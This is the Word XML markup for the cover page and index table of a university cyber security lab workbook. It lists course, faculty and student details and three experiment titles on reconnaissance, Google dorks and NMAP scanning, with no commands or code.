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A88A" w14:textId="1FFFCFA3" w:rsidR="00EB52E8" w:rsidRPr="001C411D" w:rsidRDefault="009A7427" w:rsidP="002C63F7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Cyber Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D59212" w14:textId="77777777" w:rsidR="00446075" w:rsidRPr="001C411D" w:rsidRDefault="009A7427" w:rsidP="00EB52E8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>(CSL 422</w:t>
      </w:r>
      <w:r w:rsidR="00446075" w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D519182" w14:textId="77777777" w:rsidR="00446075" w:rsidRPr="001C411D" w:rsidRDefault="00446075" w:rsidP="00EB52E8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D480151" w14:textId="6C1EFBF2" w:rsidR="00EB52E8" w:rsidRPr="001C411D" w:rsidRDefault="00EB52E8" w:rsidP="00EB52E8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="231F20"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="231F20"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab </w:t>
      </w:r>
      <w:r w:rsidR="002C63F7" w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="231F20"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Workbook</w:t>
      </w:r>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="231F20"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E675924" w14:textId="77777777" w:rsidR="00446075" w:rsidRPr="001C411D" w:rsidRDefault="00446075" w:rsidP="00EB52E8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="231F20"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DD39651" w14:textId="77777777" w:rsidR="00446075" w:rsidRPr="001C411D" w:rsidRDefault="00446075" w:rsidP="00EB52E8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593A6BE7" w14:textId="62C25CBE" w:rsidR="00EB52E8" w:rsidRPr="001C411D" w:rsidRDefault="002C63F7" w:rsidP="00EB52E8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4065D52A" wp14:editId="444CBDEE">
            <wp:extent cx="3000375" cy="208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068" cy="2086313"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="314A6BE3" w14:textId="77777777" w:rsidR="00EB52E8" w:rsidRPr="001C411D" w:rsidRDefault="00EB52E8" w:rsidP="00EB52E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F19BDAF" w14:textId="56153823" w:rsidR="00446075" w:rsidRPr="001C411D" w:rsidRDefault="00446075" w:rsidP="00446075">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Faculty name</w:t>
      </w:r>
      <w:r w:rsidR="008B33ED" w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A24BC" w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dr. Anand Sehgal</w:t>
      </w:r>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Student </w:t>
      </w:r>
      <w:r w:rsidR="001A24BC" w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ame</w:t>
      </w:r>
      <w:r w:rsidR="008B33ED" w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A24BC" w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Piyush Gambhir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698E8A5C" w14:textId="1E0719EF" w:rsidR="00446075" w:rsidRPr="001C411D" w:rsidRDefault="00446075" w:rsidP="001A24BC">
      <w:pPr>
        <w:ind w:left="5760"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Roll No.:</w:t>
      </w:r>
      <w:r w:rsidR="001A24BC" w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 21CSU349</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5ED692" w14:textId="75EACAF3" w:rsidR="00446075" w:rsidRPr="001C411D" w:rsidRDefault="00446075" w:rsidP="001A24BC">
      <w:pPr>
        <w:ind w:left="5040" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Semester:</w:t>
      </w:r>
      <w:r w:rsidR="001A24BC" w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Semester IV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5A6F22" w14:textId="0BB5C375" w:rsidR="00446075" w:rsidRPr="001C411D" w:rsidRDefault="00446075" w:rsidP="001A24BC">
      <w:pPr>
        <w:ind w:left="5760"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Group:</w:t>
      </w:r>
      <w:r w:rsidR="001A24BC" w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> AL-3 (AIML-B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1166723A" w14:textId="77777777" w:rsidR="00091855" w:rsidRPr="001C411D" w:rsidRDefault="00091855" w:rsidP="00EB52E8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D8F6C8" w14:textId="77777777" w:rsidR="002F7EC9" w:rsidRPr="001C411D" w:rsidRDefault="002F7EC9" w:rsidP="00EB52E8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2238CCC0" w14:textId="6F7FFA9F" w:rsidR="00EB52E8" w:rsidRPr="001C411D" w:rsidRDefault="00EB52E8" w:rsidP="00EB52E8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Department of Computer Science and Engineering </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7813A5A2" w14:textId="77777777" w:rsidR="00EB52E8" w:rsidRPr="001C411D" w:rsidRDefault="00EB52E8" w:rsidP="00EB52E8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>NorthCap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> University, Gurugram- 122001, India</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C6276C" w14:textId="44AE9736" w:rsidR="00EB52E8" w:rsidRPr="001C411D" w:rsidRDefault="00EB52E8" w:rsidP="00EB52E8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Session 20</w:t>
      </w:r>
      <w:r w:rsidR="00CF3C5F" w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="002C63F7" w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00CF3C5F" w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>-2</w:t>
      </w:r>
      <w:r w:rsidR="002C63F7" w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E31F8B" w14:textId="77777777" w:rsidR="003A6F80" w:rsidRPr="001C411D" w:rsidRDefault="003A6F80" w:rsidP="00EB52E8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="003A6F80" w:rsidRPr="001C411D" w:rsidSect="00A276F4">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="577A20C0" w14:textId="77777777" w:rsidR="00EB52E8" w:rsidRPr="001C411D" w:rsidRDefault="009A3256" w:rsidP="00EB52E8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>INDEX</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47"/>
        <w:gridCol w:w="813"/>
        <w:gridCol w:w="1531"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="952"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="1360"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B43E47" w:rsidRPr="001C411D" w14:paraId="45C101CC" w14:textId="77777777" w:rsidTr="00FB119E">
        <w:trPr>
          <w:trHeight w:val="906"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0347406B" w14:textId="77777777" w:rsidR="00EB52E8" w:rsidRPr="001C411D" w:rsidRDefault="009A3256" w:rsidP="007C6AD1">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>S.No</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5F7EF41A" w14:textId="77777777" w:rsidR="00EB52E8" w:rsidRPr="001C411D" w:rsidRDefault="00EB52E8" w:rsidP="007C6AD1">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1847" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2467823C"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Experiment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31FBFAC9"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Page No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AD0B355"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Date of Experiment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="237C9434"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Date of Submission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="952" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D4E5DF0"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Marks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4276B23B" w14:textId="77777777" w:rsidR="00EB52E8" w:rsidRPr="001C411D" w:rsidRDefault="00EB52E8" w:rsidP="007C6AD1">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CO Covered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EA04697" w14:textId="77777777" w:rsidR="00EB52E8" w:rsidRPr="001C411D" w:rsidRDefault="00EB52E8" w:rsidP="00DF4764">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Sign</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F4601" w:rsidRPr="001C411D" w14:paraId="2A44D9E8" w14:textId="77777777" w:rsidTr="00BE293D">
        <w:trPr>
          <w:trHeight w:val="906"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="186EBB04" w14:textId="356F772A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1847" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B093C00" w14:textId="3EEFAEB7" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Perform reconnaissance to find all the relevant information on selected websites using 10 network information gathering tools.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C4FCB01"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7C2BBAB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34A68753"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73A23F6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32678B31"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4953ADF1"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1858EB98" w14:textId="77777777" w:rsidTr="00BE293D">
        <w:trPr>
          <w:trHeight w:val="906"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E686D94" w14:textId="103B5CF4"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1847" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77408780" w14:textId="0C0E66AB" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Gather information using Social Networking sites and google Dorks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="019B374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3AA58447"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7AD0629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27626AFC"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05AF076A"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26BC1406"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0F08E023" w14:textId="77777777" w:rsidTr="00BE293D">
        <w:trPr>
          <w:trHeight w:val="906"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2652EFA6" w14:textId="5069B62F"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1847" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56C08D71" w14:textId="59316B29" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Perform Network Scanning using NMAP</w:t>
            </w:r>
            <w:r w:rsidR="0095485B" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>and ZENMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
